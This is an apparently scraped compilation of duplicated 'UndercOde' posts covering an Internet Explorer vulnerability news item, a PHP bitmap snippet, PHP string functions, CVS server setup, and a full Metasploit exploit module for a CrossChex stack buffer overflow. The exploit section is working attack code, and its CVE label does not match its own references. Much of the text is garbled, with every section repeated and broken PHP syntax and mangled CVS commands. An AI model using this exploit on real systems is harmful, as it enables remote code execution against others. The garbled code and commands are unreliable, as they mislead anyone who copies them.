β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Now :Microsoft releases security update for Windows 7 due to severe IE vulnerabilityπ
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ
1) Microsoft releases security update for Windows 7 due to severe IE vulnerability
2) Both Windows 7 and IE browsers have stopped supporting last month, but due to the latest serious IE vulnerability, Microsoft decided to provide security patches for Windows 7 system again. After discovering a JavaScript engine vulnerability that was widely used by hackers, Microsoft decided to provide security updates for all older browsers before IE
3) This remote code execution vulnerability exists in the memory of IE processing script engine objects. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user.
4) If the current user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install the program. View, change or delete data; or create a new account with full user rights.
5) In a cyber attack scenario, an attacker could create a specially crafted website that specifically exploits the IE vulnerability, and then convince users to view the website. An attacker could access an application hosted on the IE rendering engine or an ActiveX control labeled "Initial Security" embedded in Microsoft Office office documents. Attackers may also use infected websites to accept or host user-provided content or advertisements. These websites may contain specially crafted content that could exploit this vulnerability.
6) The exploit can be triggered by any application that can host HTML, such as documents or PDFs, and has a "critical" rating on Windows 7, 8.1, and 10, and is currently widely used by hackers. Microsoft will release patches for all of these operating systems as well as Windows
π¦ Now :Microsoft releases security update for Windows 7 due to severe IE vulnerabilityπ
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ
1) Microsoft releases security update for Windows 7 due to severe IE vulnerability
2) Both Windows 7 and IE browsers have stopped supporting last month, but due to the latest serious IE vulnerability, Microsoft decided to provide security patches for Windows 7 system again. After discovering a JavaScript engine vulnerability that was widely used by hackers, Microsoft decided to provide security updates for all older browsers before IE
3) This remote code execution vulnerability exists in the memory of IE processing script engine objects. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user.
4) If the current user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install the program. View, change or delete data; or create a new account with full user rights.
5) In a cyber attack scenario, an attacker could create a specially crafted website that specifically exploits the IE vulnerability, and then convince users to view the website. An attacker could access an application hosted on the IE rendering engine or an ActiveX control labeled "Initial Security" embedded in Microsoft Office office documents. Attackers may also use infected websites to accept or host user-provided content or advertisements. These websites may contain specially crafted content that could exploit this vulnerability.
6) The exploit can be triggered by any application that can host HTML, such as documents or PDFs, and has a "critical" rating on Windows 7, 8.1, and 10, and is currently widely used by hackers. Microsoft will release patches for all of these operating systems as well as Windows
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Make an xbm picturexbm is a simple two-color bitmap image format, use more early cgi, the current used for the counter
By UndercOde
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ
<PHP?
setXBM (1234567890,0);
function setXBM (NUM $, $ MODE = 0) {
setType ( $ num, "string");
$ mode = $ mode? 0xff: 0x00;
$ int_width = strlen ($ num); // digits
$ count_width = 8; // single number width
$ count_height = 16; // height
$ bitmap = array (
0 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
1 => array (0xff, 0xff) , 0xff, 0xcf, 0xc7, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xff, 0xff, 0xff),
2 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xcf , 0xe7, 0xf3, 0xf9, 0xf9, 0x81, 0xff, 0xff, 0xff),
3 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xc7, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
4 => array(0xff, 0xff, 0xff, 0xcf, 0xcf, 0xc7, 0xc7, 0xcb, 0xcb, 0xcd, 0x81, 0xcf, 0x87, 0xff, 0xff, 0xff),
5 => array(0xff, 0xff, 0xff, 0x81, 0xf9, 0xf9, 0xf9, 0xc1, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
6 => array(0xff, 0xff, 0xff, 0xc7, 0xf3, 0xf9, 0xf9, 0xc1, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
7 => array(0xff, 0xff, 0xff, 0x81, 0x99, 0x9f, 0x9f, 0xcf, 0xcf, 0xe7, 0xe7, 0xf3, 0xf3, 0xff, 0xff, 0xff),
8 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0xc3, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
9 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x83, 0x9f, 0x9f, 0xcf, 0xe3, 0xff, 0xff, 0xff)
);
echo "#define counter_width " .($count_width * $int_width)."\r\n";
echo "#define counter_height " .$count_height. "\r\n";
echo "static unsigned char counter_bits[] = {\r\n";
for($i=0; $i<$count_height; ++$i) {
for($j = 0; $j < $int_width; ++$j) {
printf("0x%2x, ",$bitmap[$num[$j]][$i]^$mode);
}
}
π¦ Make an xbm picturexbm is a simple two-color bitmap image format, use more early cgi, the current used for the counter
By UndercOde
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ
<PHP?
setXBM (1234567890,0);
function setXBM (NUM $, $ MODE = 0) {
setType ( $ num, "string");
$ mode = $ mode? 0xff: 0x00;
$ int_width = strlen ($ num); // digits
$ count_width = 8; // single number width
$ count_height = 16; // height
$ bitmap = array (
0 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
1 => array (0xff, 0xff) , 0xff, 0xcf, 0xc7, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xcf, 0xff, 0xff, 0xff),
2 => array (0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xcf , 0xe7, 0xf3, 0xf9, 0xf9, 0x81, 0xff, 0xff, 0xff),
3 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x9f, 0x9f, 0xc7, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
4 => array(0xff, 0xff, 0xff, 0xcf, 0xcf, 0xc7, 0xc7, 0xcb, 0xcb, 0xcd, 0x81, 0xcf, 0x87, 0xff, 0xff, 0xff),
5 => array(0xff, 0xff, 0xff, 0x81, 0xf9, 0xf9, 0xf9, 0xc1, 0x9f, 0x9f, 0x9f, 0x99, 0xc3, 0xff, 0xff, 0xff),
6 => array(0xff, 0xff, 0xff, 0xc7, 0xf3, 0xf9, 0xf9, 0xc1, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
7 => array(0xff, 0xff, 0xff, 0x81, 0x99, 0x9f, 0x9f, 0xcf, 0xcf, 0xe7, 0xe7, 0xf3, 0xf3, 0xff, 0xff, 0xff),
8 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0xc3, 0x99, 0x99, 0x99, 0x99, 0xc3, 0xff, 0xff, 0xff),
9 => array(0xff, 0xff, 0xff, 0xc3, 0x99, 0x99, 0x99, 0x99, 0x83, 0x9f, 0x9f, 0xcf, 0xe3, 0xff, 0xff, 0xff)
);
echo "#define counter_width " .($count_width * $int_width)."\r\n";
echo "#define counter_height " .$count_height. "\r\n";
echo "static unsigned char counter_bits[] = {\r\n";
for($i=0; $i<$count_height; ++$i) {
for($j = 0; $j < $int_width; ++$j) {
printf("0x%2x, ",$bitmap[$num[$j]][$i]^$mode);
}
}
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ String manipulation functionsThere are many string manipulation functions in PHP 3.0, the most important are the following:
pinterest.com/UndercOdeOfficial
1) echo, print, printf, sprintf are
used to output strings. If there is a variable name in the string, it is replaced with its value. The latter two functions are similar to C's functions of the same name.
2) strchr, strlen, strtok, strrchr, strrev, strstr, strtolower, strtoupper, substr, ucfirst
string manipulation functions, some of them have exactly the same meaning as the functions of the same name in C strrev is to flip a string. strtolower and strtoupper are to convert the string to lowercase and uppercase. ucfirst is to convert the first character of the string to uppercase. substr is a substring of the returned string, usage is: substr (String, head, length). The head position is counted from 0. If it is negative, it means counting from the tail to the front.
3) Chr, Ord
function with the same name.
4) explode, implement, join
and Functions related to arrays. Explode (string, delimiter) returns an array produced by dividing a string at a delimiter. Implode (array, delimiter) returns a result of inserting a delimiter between the elements of an array string implode and join the same meaning.
5) Chop
processing . Trailing white space
6) htmlspecialchars
the HTML special characters into their names, such as "<" to "& lt;".
7) Add "<BR>" in front of each carriage return in HTML.
AddSlashes, StripSlashes
8) Add "\" and remove "\" to the string as required. For some databases, you must query the Characters can be queried after adding and removing "\".
9) parse_str
analyzes strings of type "name1 = value1 & name2 = value2 & ..." into variables.
> For example: parse_str ("a = 1 & b = 2"); Generate $ a and $ b variables with values of 1,2. If two pairs of names / values have the same name part, the value of the latter overwrites the previous one. If both ends of the name have "[ ] ", Such as" a [] =
π¦ String manipulation functionsThere are many string manipulation functions in PHP 3.0, the most important are the following:
pinterest.com/UndercOdeOfficial
1) echo, print, printf, sprintf are
used to output strings. If there is a variable name in the string, it is replaced with its value. The latter two functions are similar to C's functions of the same name.
2) strchr, strlen, strtok, strrchr, strrev, strstr, strtolower, strtoupper, substr, ucfirst
string manipulation functions, some of them have exactly the same meaning as the functions of the same name in C strrev is to flip a string. strtolower and strtoupper are to convert the string to lowercase and uppercase. ucfirst is to convert the first character of the string to uppercase. substr is a substring of the returned string, usage is: substr (String, head, length). The head position is counted from 0. If it is negative, it means counting from the tail to the front.
3) Chr, Ord
function with the same name.
4) explode, implement, join
and Functions related to arrays. Explode (string, delimiter) returns an array produced by dividing a string at a delimiter. Implode (array, delimiter) returns a result of inserting a delimiter between the elements of an array string implode and join the same meaning.
5) Chop
processing . Trailing white space
6) htmlspecialchars
the HTML special characters into their names, such as "<" to "& lt;".
7) Add "<BR>" in front of each carriage return in HTML.
AddSlashes, StripSlashes
8) Add "\" and remove "\" to the string as required. For some databases, you must query the Characters can be queried after adding and removing "\".
9) parse_str
analyzes strings of type "name1 = value1 & name2 = value2 & ..." into variables.
> For example: parse_str ("a = 1 & b = 2"); Generate $ a and $ b variables with values of 1,2. If two pairs of names / values have the same name part, the value of the latter overwrites the previous one. If both ends of the name have "[ ] ", Such as" a [] =
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Anviz CrossChex - Buffer Overflow (Metasploit)
CVE-2020-2019 EXPLOITE β οΈ
Tested by UndercOde On Windows 10 :
twitter.com/UndercOdeTC
> This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##IP
π¦ class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
PACKET_LEN = 10
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Anviz CrossChex Buffer Overflow',
'Description' => %q{
Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
triggering a stack buffer overflow.
},
'Author' =>
[
'Luis Catarino <lcatarino@protonmail.com>', # original discovery/exploit
'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit
'agalway-r7', # Module creation
'adfoster-r7' # Module creation
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-12518'],
['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
['EDB', '47734']
],
'Payload' =>
{
'Space' => 8947,
'DisableNops' => true
},
'Arch' => ARCH_X86,
'EncoderType' => Msf::Encoder::Type::Raw
'Privileged' => true,
'Platform' => 'win',
'DisclosureDate' => '2019-11-28',
'Targets' =>
[
[
'Crosschex Standard x86 <= V4.3.12',
{
'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
'Shift' => 4 # Positions payload to be written at beginning of ESP
}
]
],
'DefaultTarget' => 0
))
deregister_udp_options
register_options(
[
Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
])
end
def exploit
connect_udp
res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))
if res.empty?
fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
end
print_status "CrossChex broadcast received, sending payload in response"
sploit = rand_text_english(target['Offset'])
sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
sploit << payload.encoded
udp_sock.sendto(sploit, host, port)
print_status "Payload sent"
end
end
π¦ Anviz CrossChex - Buffer Overflow (Metasploit)
CVE-2020-2019 EXPLOITE β οΈ
Tested by UndercOde On Windows 10 :
twitter.com/UndercOdeTC
> This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##IP
π¦ class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
PACKET_LEN = 10
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Anviz CrossChex Buffer Overflow',
'Description' => %q{
Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,
triggering a stack buffer overflow.
},
'Author' =>
[
'Luis Catarino <lcatarino@protonmail.com>', # original discovery/exploit
'Pedro Rodrigues <pedrosousarodrigues@protonmail.com>', # original discovery/exploit
'agalway-r7', # Module creation
'adfoster-r7' # Module creation
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-12518'],
['URL', 'https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html'],
['EDB', '47734']
],
'Payload' =>
{
'Space' => 8947,
'DisableNops' => true
},
'Arch' => ARCH_X86,
'EncoderType' => Msf::Encoder::Type::Raw
'Privileged' => true,
'Platform' => 'win',
'DisclosureDate' => '2019-11-28',
'Targets' =>
[
[
'Crosschex Standard x86 <= V4.3.12',
{
'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
'Shift' => 4 # Positions payload to be written at beginning of ESP
}
]
],
'DefaultTarget' => 0
))
deregister_udp_options
register_options(
[
Opt::CPORT(5050, true, 'Port used to listen for CrossChex Broadcast.'),
Opt::CHOST("0.0.0.0", true, 'IP address that UDP Socket listens for CrossChex broadcast on. \'0.0.0.0\' is needed to receive broadcasts.'),
OptInt.new('TIMEOUT', [true, 'Time in seconds to wait for a CrossChex broadcast. 0 or less waits indefinitely.', 100])
])
end
def exploit
connect_udp
res, host, port = udp_sock.recvfrom(PACKET_LEN, datastore["TIMEOUT"].to_i > 0 ? (datastore["TIMEOUT"].to_i) : (nil))
if res.empty?
fail_with(Failure::TimeoutExpired, "Module timed out waiting for CrossChex broadcast")
end
print_status "CrossChex broadcast received, sending payload in response"
sploit = rand_text_english(target['Offset'])
sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
sploit << payload.encoded
udp_sock.sendto(sploit, host, port)
print_status "Payload sent"
end
end
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ LINUX as the CVS server two
twitter.com/UndercOdeTC
1) backup and mobile software library of
backup software library files and other backup files is no different, but you need a backup tool to open this lock CVS, you must first register a user can read the software library. To open the CVS software library, you need to edit the `` # cvs.rfl 'file.
2) When you want to use a backed up soft library to restore the original library, if the original library has been changed after you backed up, CVS will report an error. You must Follow the steps below to
> get a new working directory
3) Copy the files that failed the last commit (of course, you can't copy the CVS directory files)
4) Work in the new directory, use cvs update or cvs diff and other commands to indicate those changes. Use cvs commit to save changes to the software library.
5) If you want to move a software library to another place, it is also very simple. The easiest way is to create a new directory to the directory to be moved. If you want to re- using the original directory, it can only manually modify the `` CVS / Repository '' and `` CVS / Root '', unless you're good at this, otherwise it is not recommended.
π¦ LINUX as the CVS server two
twitter.com/UndercOdeTC
1) backup and mobile software library of
backup software library files and other backup files is no different, but you need a backup tool to open this lock CVS, you must first register a user can read the software library. To open the CVS software library, you need to edit the `` # cvs.rfl 'file.
2) When you want to use a backed up soft library to restore the original library, if the original library has been changed after you backed up, CVS will report an error. You must Follow the steps below to
> get a new working directory
3) Copy the files that failed the last commit (of course, you can't copy the CVS directory files)
4) Work in the new directory, use cvs update or cvs diff and other commands to indicate those changes. Use cvs commit to save changes to the software library.
5) If you want to move a software library to another place, it is also very simple. The easiest way is to create a new directory to the directory to be moved. If you want to re- using the original directory, it can only manually modify the `` CVS / Repository '' and `` CVS / Root '', unless you're good at this, otherwise it is not recommended.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦CVS remote user management by UndercOde :
instagram.com/UndercOdeTestingCompany
1) as a CVS server, you should Two points. First, ensure that the software library has enough space. Second, ensure that there is no less than 32M of memory. The server generates two processes for each user who connects to it.
2) The cost of the child process is small. But if the network bandwidth not enough, spending on the parent process is enormous.
3) Another big spending is diff file, when large source files, authenticates him or expenses detection is also great.
π¦ remote user login authentication method
> to rsh for routine remote login
1) Cvs server should use rsh to allow users to connect. Rshosts should be configured.
2) Assume that the user tom on the remote host tom.exsample.com needs to connect to the funame.simple.com cvs server to work. The server-side bach directory should be edited. Add
> Tom.exsample.com tom
> client to run rsh -l bach funame.simple.com 'echo @PATH
3) to make sure that you can connect to the CVS server, and the client should write the displayed path to .bashrc or cshrc (Instead of .logiin or .profile.)
4) In addition, the client can also define the environment variable CVS_SEVER. To define the location of the host. On the server side, modify the /etc/ineted.conf file to tell the server to get specific When the port is connected, run cvssever.
5) The default value of this port number is: 2041. Of course, in order not to be set every time you use it, you can use it by defining the environment variable CVS_AUTH_PORT on the
> client . Call, just add the following sentence in /etc/ineted.conf file to 2401 stream tcp nowait root / usr / local / bin / cvs cvs --f --allow --root = / cvsroot pserver
6) can also use the -T option to define the buffer directory.
βallow β root defines the software libraries available to users. If there are more software libraries on the server, this sentence needs to be reused. In addition, internal users can do this Define the environment variable CVSROOT
: pseve: usr@funam.simple.com: / cvsroot
7) Where usr is the username (for linux) funam.simple.com is the cvs server, and assumes / cvsroot is the directory name of the software library. The remote user can use the following form::
etx: psever: usr@funam.silple.com: / cvsroot
: etx: It is defined as a remote user, and the rest is the same as above.
8) If the client's ineted is used by general calls, only in / etc / seveice Add the following sentence:
cvspsever 2401 / tcp
restart ineted to read the initialization file.
9) CVS user management. In the default state (such as telnet login), the same user name and password as the Linux system That is: As long as you log in to the Linux system, you have read-only permissions for $ CVSROOT. Of course, for a software developer, you must have read-write permissions for the corresponding directory to complete the source code upgrade and other tasks. Therefore CVS also provides its own user authentication system to manage users more conveniently.
10) On the server side, there can be a passwd file under $ CVSROOT / CVSROOT (which can be defined with the environment variable CVS_PASSFILE.) To record cvs user information. He uses It is the same organization form as linux etc / passwd. Similarly, its passwold is also encrypted by linux standard. Here is the content of a passwd
anyone:
tom: xyzkue
mary: yuio: pubcvs
11) The first line means that when you log in as anyone, no password is required. Even if you type an empty string, of course, what you get in this way may be read-only rights. The second line means, Tom needs to enter passwold when logging in. The passworld is encrypted with xyzkue. After logging in in this way, generally higher permissions can be obtained
π¦CVS remote user management by UndercOde :
instagram.com/UndercOdeTestingCompany
1) as a CVS server, you should Two points. First, ensure that the software library has enough space. Second, ensure that there is no less than 32M of memory. The server generates two processes for each user who connects to it.
2) The cost of the child process is small. But if the network bandwidth not enough, spending on the parent process is enormous.
3) Another big spending is diff file, when large source files, authenticates him or expenses detection is also great.
π¦ remote user login authentication method
> to rsh for routine remote login
1) Cvs server should use rsh to allow users to connect. Rshosts should be configured.
2) Assume that the user tom on the remote host tom.exsample.com needs to connect to the funame.simple.com cvs server to work. The server-side bach directory should be edited. Add
> Tom.exsample.com tom
> client to run rsh -l bach funame.simple.com 'echo @PATH
3) to make sure that you can connect to the CVS server, and the client should write the displayed path to .bashrc or cshrc (Instead of .logiin or .profile.)
4) In addition, the client can also define the environment variable CVS_SEVER. To define the location of the host. On the server side, modify the /etc/ineted.conf file to tell the server to get specific When the port is connected, run cvssever.
5) The default value of this port number is: 2041. Of course, in order not to be set every time you use it, you can use it by defining the environment variable CVS_AUTH_PORT on the
> client . Call, just add the following sentence in /etc/ineted.conf file to 2401 stream tcp nowait root / usr / local / bin / cvs cvs --f --allow --root = / cvsroot pserver
6) can also use the -T option to define the buffer directory.
βallow β root defines the software libraries available to users. If there are more software libraries on the server, this sentence needs to be reused. In addition, internal users can do this Define the environment variable CVSROOT
: pseve: usr@funam.simple.com: / cvsroot
7) Where usr is the username (for linux) funam.simple.com is the cvs server, and assumes / cvsroot is the directory name of the software library. The remote user can use the following form::
etx: psever: usr@funam.silple.com: / cvsroot
: etx: It is defined as a remote user, and the rest is the same as above.
8) If the client's ineted is used by general calls, only in / etc / seveice Add the following sentence:
cvspsever 2401 / tcp
restart ineted to read the initialization file.
9) CVS user management. In the default state (such as telnet login), the same user name and password as the Linux system That is: As long as you log in to the Linux system, you have read-only permissions for $ CVSROOT. Of course, for a software developer, you must have read-write permissions for the corresponding directory to complete the source code upgrade and other tasks. Therefore CVS also provides its own user authentication system to manage users more conveniently.
10) On the server side, there can be a passwd file under $ CVSROOT / CVSROOT (which can be defined with the environment variable CVS_PASSFILE.) To record cvs user information. He uses It is the same organization form as linux etc / passwd. Similarly, its passwold is also encrypted by linux standard. Here is the content of a passwd
anyone:
tom: xyzkue
mary: yuio: pubcvs
11) The first line means that when you log in as anyone, no password is required. Even if you type an empty string, of course, what you get in this way may be read-only rights. The second line means, Tom needs to enter passwold when logging in. The passworld is encrypted with xyzkue. After logging in in this way, generally higher permissions can be obtained
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦CVS remote user management by UndercOde :
Part 2:
pinterest.com/UndercOdeOfficial
1) The third line means that when mary logs in, the password needs to be entered. Enter and system users The same software library. The purpose of doing this is because .cvs will record all the actions of its users in the software library. Definitions and system users have different identities. Using cvs.
> For example; using user tom can log in in the following ways :
$ cvs --d: etx: tom@funam.simple.com: / cvsroot login
(If the user name tom is the same internally at the remote end, tom @ can also be omitted)
3) At the same time, you can use cvs loginout to change all Environment variables are revoked.
4) Accessing
CVS using GASSAPI also supports TCP direct access using GASSAPI. Before using Anzhuan, you need to recompile CVS to get GASSAPI support. Use --with --gassapi to connect, or use -a to select the direction Connect One way to use the same room and authenticate the GASSAPI.
5) However, when login is required to redefine $ CVSROOT such as:.
$ CVS -d: gsever: usr@cvssever.com: / CVSROOT Login
kerberos is directly connected
simplest use of rsh The method is described above. The main feature of this method is that all data is passed through an additional program. It is very time consuming. If kerberos is installed, you can directly use TCP connection.
6) Similarly, CVS needs to be recompiled to get keberos support. --With-krb4 can be used to connect. The data transmitted in this way is not encrypted. If you want to obtain security, you must use `` --enable-encryption '' on both the server and the client. At this time, you need to use the general variable -x to require encryption. You
need to edit inetd.conf on the server to run cvs kserver. The default port number of the client is 1999. If you want to use another port number, you need to define it on the user side. CVS_CLIENT_PORT
at this time should be the login command
9) cvs -d: kserver: faun.example.org: / usr / local / cvsroot checkout foo
with fork connection
with this mode, you can connect a local hard disk via the remote protocol software library in other words. He can have the same function as: local: The login command in this way is
cvs -d: fork: / usr / local / cvsroot login
and the same as: etx :. The default host name is cvs
Cvs server rack application example
π¦CVS remote user management by UndercOde :
Part 2:
pinterest.com/UndercOdeOfficial
1) The third line means that when mary logs in, the password needs to be entered. Enter and system users The same software library. The purpose of doing this is because .cvs will record all the actions of its users in the software library. Definitions and system users have different identities. Using cvs.
> For example; using user tom can log in in the following ways :
$ cvs --d: etx: tom@funam.simple.com: / cvsroot login
(If the user name tom is the same internally at the remote end, tom @ can also be omitted)
3) At the same time, you can use cvs loginout to change all Environment variables are revoked.
4) Accessing
CVS using GASSAPI also supports TCP direct access using GASSAPI. Before using Anzhuan, you need to recompile CVS to get GASSAPI support. Use --with --gassapi to connect, or use -a to select the direction Connect One way to use the same room and authenticate the GASSAPI.
5) However, when login is required to redefine $ CVSROOT such as:.
$ CVS -d: gsever: usr@cvssever.com: / CVSROOT Login
kerberos is directly connected
simplest use of rsh The method is described above. The main feature of this method is that all data is passed through an additional program. It is very time consuming. If kerberos is installed, you can directly use TCP connection.
6) Similarly, CVS needs to be recompiled to get keberos support. --With-krb4 can be used to connect. The data transmitted in this way is not encrypted. If you want to obtain security, you must use `` --enable-encryption '' on both the server and the client. At this time, you need to use the general variable -x to require encryption. You
need to edit inetd.conf on the server to run cvs kserver. The default port number of the client is 1999. If you want to use another port number, you need to define it on the user side. CVS_CLIENT_PORT
at this time should be the login command
9) cvs -d: kserver: faun.example.org: / usr / local / cvsroot checkout foo
with fork connection
with this mode, you can connect a local hard disk via the remote protocol software library in other words. He can have the same function as: local: The login command in this way is
cvs -d: fork: / usr / local / cvsroot login
and the same as: etx :. The default host name is cvs
Cvs server rack application example
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β ββ β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ SERVER SETUP BY UNDERCODE :
If you have installed cvs, it is very easy to set up a server with cvs host cvs.exam.org. The steps are as follows:
instagram.com/UndercOdeTestingCompany
A) 1) Log in as root. Building a software repository (repository)
$ export CVSROOT = / cvsroot
$ mkdir / cvsroot
$ cd / cvsroot
$ cvs init
2) Set execute permissions
$ chmod / cvsroot / CVSROOT 744 (/ ccvsroo / CVSOOT set to read-only)
$ chmod / cvsroot 764 Group number (/ cvsroot for development (The group can read and write)
3)Modify the file for the benefit of others. Because the development team is a system user, it is better to use the system user name and password here. Edit the rhosts file as follows:
tom.example.com. Tom
modify /Etc/inetd.conf file on the server, add the following sentence
2401 stream tcp nowait root / usr / local / bin / cvs cvs -f --allow-root = / usr / cvsroot pserver. In
this way, a basic cvs The server is built.
We just provide a basic application here. The real details of the cvs application are very complicated. We only introduce some introductions here. Friends with interest can read its installation documentation.
B) 1) Application examples
( use cvs system on the host, you can telnet to the host, and then use, and no difference in the use of this machine, so this has been no mention of)
2) the assumption in the above example tom on the system you want to use cvs cvs host to everyone and collaborative development. It is the first camp to configure some of their own environment variables first edit / etc / services '' adding:
cvspserver 2401 / tcp
then add the following code to the .profile file
CVSROOT =: etx: psever: tom@cvs.exam.org: / cvsroot
Export CVSROOT
3) so he can use $ cvs login to log in. Below we will use tom The specific use is to explain the application of cvs. Like other linux commands. Cvs also has a large number of parameters. We will make a list in the next section.
Tom has the following file
Ecample.c exampl2.c tes1 in the / usr / test directory .c test2.c utimel.c tty.c
If you want to create your own directory in the software library
$ cd / usr / test
~ test $ cvs import βm βtom first creationβ tomdir tom tomwork
N tomdit / example.c
N tomdit / exampl2.c
N tomdir / test1.c
N tomdir / test2.c
N tomdir / utmel.c
N tomdit / tty.c
4) No conflicts creat by this import
command description import submit command -m followed by description.tom publisher tomwork is a release Label. If the prompt CVSROOT is wrong, you can use--d and add CVSROOT
Note: For all cvs commands, you can use cvs command -H to get help. At this time, there is a tomdir subdirectory under the / cvs directory on the server side. Contents:
example.c, v exampl2.c, v test1.c, v test2 .c, v tty.c, v utimel.c, v
This time the first submission is completed.
This way, you don't need to worry about accidentally deleting the test directory. Use the following command to check out a backup of the source file from the software library
$ / cd usr
`` usr $ / cvs checkout test tomdir-r 1.1
U test / exsample.c
U test / exampl1.c
U test / test1.c
U test / test2.c
U test / tty.c
U test / ulnem.c
6) The cvs checkout command is to get the latest version by default. We can also get an old version. This command is to remove the 1.1 version of tomdir code. After recovery, a CVS directory is added to manage the test directory. When submitting or modifying once, it interfaces with the management files on the server to ensure a good version. This example is very small. In reality, it is very likely that there are many files in the project, so you can restore the CVSROOT module first
~ usr / $ cvs checkout CVSROOT / mouldes
~ / usr / $ vi CVSROOT / mouldes Edit the module name, such as we add
src p to the end of the file roject / src
print project / src / print
After cvs commit
, we can use cvs checkout print instead of
cvs checkout project / src / print
. After editing, we can commit the file
π¦ SERVER SETUP BY UNDERCODE :
If you have installed cvs, it is very easy to set up a server with cvs host cvs.exam.org. The steps are as follows:
instagram.com/UndercOdeTestingCompany
A) 1) Log in as root. Building a software repository (repository)
$ export CVSROOT = / cvsroot
$ mkdir / cvsroot
$ cd / cvsroot
$ cvs init
2) Set execute permissions
$ chmod / cvsroot / CVSROOT 744 (/ ccvsroo / CVSOOT set to read-only)
$ chmod / cvsroot 764 Group number (/ cvsroot for development (The group can read and write)
3)Modify the file for the benefit of others. Because the development team is a system user, it is better to use the system user name and password here. Edit the rhosts file as follows:
tom.example.com. Tom
modify /Etc/inetd.conf file on the server, add the following sentence
2401 stream tcp nowait root / usr / local / bin / cvs cvs -f --allow-root = / usr / cvsroot pserver. In
this way, a basic cvs The server is built.
